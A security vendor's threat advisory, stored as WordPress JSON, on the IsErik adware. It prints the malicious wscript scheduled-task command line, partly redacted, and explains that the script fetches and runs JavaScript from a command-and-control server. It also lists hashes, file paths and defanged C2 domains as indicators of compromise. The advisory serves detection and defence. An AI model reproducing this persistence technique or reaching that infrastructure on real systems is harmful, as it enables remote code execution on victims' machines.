{"id":3078,"date":"2021-08-18T15:31:39","date_gmt":"2021-08-18T13:31:39","guid":{"rendered":"https:\/\/fortgale.com\/news\/?p=3078"},"modified":"2026-06-08T23:10:35","modified_gmt":"2026-06-08T23:10:35","slug":"advanced-persistent-adware-iserik","status":"publish","type":"post","link":"https:\/\/fortgale.com\/blog\/emerging-threats\/advanced-persistent-adware-iserik\/","title":{"rendered":"Advanced Persistent Adware: IsErik"},"content":{"rendered":"\n<p style=\"text-align: justify\">This advisory is the result of analysis conducted by threat-intelligence analysts following the identification of a security anomaly during delivery of <a href=\"https:\/\/fortgale.com\/en\/managed-detection-and-response\/\">Managed Detection and Response<\/a> (MDR) services.<\/p>\n\n\n\n<p style=\"text-align: justify\">Specifically, the anomaly detected is associated with a particularly invasive and persistent adware-type software: <strong>ADWARE IsErIk<\/strong>.<\/p>\n\n\n\n<p style=\"text-align: justify\">This threat, categorized as <strong>Advanced Persistent Adware<\/strong>, is frequently disguised as &#8220;portable&#8221; versions of commercial products or as license key generators (<strong>keygen<\/strong>) for commercial applications. In certain cases the software requests user permission to install additional software, causing command execution on the target machine.<\/p>\n\n\n\n<p style=\"text-align: justify\">System infection occurs through creation of a <strong>scheduled task<\/strong> designed to execute <strong>Javascript<\/strong> code via WScript. During incident response operations, the task name was identified as <strong>\\Secured Yahoo Powered nalel<\/strong>, used for execution of the command:<\/p>\n\n\n\n<p style=\"text-align: left\"><code>C:\\Windows\\system32\\wscript.exe \"C:\\ProgramData\\{38E1FD82-B2A3-7744-3465-XXXXXXX}\\tano.txt\" \"687474XXXXXXX636f6d\" \"433a5c50XXXXX237363243387d5c726572656669\" \"433a5c50726XXXXXXXX237363243387d5c7269646f746f64\" \"\/\/B\" \"\/\/E:jscript\" \"--IsErIk\"`<\/code>,<\/p>\n\n\n\n<p style=\"text-align: justify\">which, after verifying the presence of the <code>--IsErIk<\/code> parameter, decodes the remaining parameters and connects to the command-and-control server (in this case the URL <strong>hxxps:\/\/ddukmql[.]com<\/strong>) and performs POST requests, whose responses consist of additional <strong>Javascript code<\/strong> to be executed on the compromised system.<\/p>\n\n\n\n<h2 class=\"has-text-align-center wp-block-heading\" id=\"indicatori-di-compromissione\"><strong>Indicators of Compromise<\/strong><\/h2>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"sha256\"><strong>SHA256<\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\"><li>2b89075ad9485d72bcf6548afaee7ba8d4fa0f77e874d62efd70c9c311dc406d (C:\\ProgramData{38E1FD82-B2A3-7744-3465-E906AE2762C8}\\tano.txt)<\/li><\/ul>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"file-path\"><strong>File Path<\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\"><li>C:\\ProgramData{38E1FD82-B2A3-7744-3465-E906AE2762C8}\\tano.txt<\/li><li>C:\\ProgramData{89F74C94-03B5-C652-8573-58101F31D3DE}\\tofi.txt<\/li><li>C:\\ProgramData{F4723111-7E30-BBD7-F8F6-259562B4AE5B}\\rari.txt<\/li><li>C:\\ProgramData{595E9C3D-D31C-16FB-55DA-88B9CF980377}\\fala.txt<\/li><li>C:\\ProgramData{19B7DCD4-93F5-5612-1533-C8508F71439E}\\faso<\/li><li>C:\\ProgramData{F3BF36DC-79FD-BC1A-FF3B-22586579A996}\\doro<\/li><\/ul>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"domini\"><strong>Domains<\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\"><li>ddukmql[.]com<\/li><li>katunaq[.]com<\/li><li>tdfpa[.]com<\/li><li>qajolos[.]com<\/li><li>butapujo[.]com<\/li><li>rududulu[.]com<\/li><\/ul>\n","protected":false},"excerpt":{"rendered":"<p>IsErik adware family with APT-style persistence: registry tampering, browser hijack persistence, removal complexity and detection considerations.<\/p>\n","protected":false},"author":1,"featured_media":2489,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[1701,3306,3307,1703,1705,1707,1709,1711,3308,1445],"class_list":["post-3078","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-emerging-threats","tag-adware-it","tag-adware-persistence","tag-browser-hijack","tag-iserik-it","tag-iserlk-it","tag-lserlk-it","tag-malicious-it","tag-persistent-it","tag-removal-complexity","tag-threat-it"],"_links":{"self":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/3078","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/comments?post=3078"}],"version-history":[{"count":2,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/3078\/revisions"}],"predecessor-version":[{"id":9909,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/3078\/revisions\/9909"}],"wp:attachment":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/media?parent=3078"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/categories?post=3078"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/tags?post=3078"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}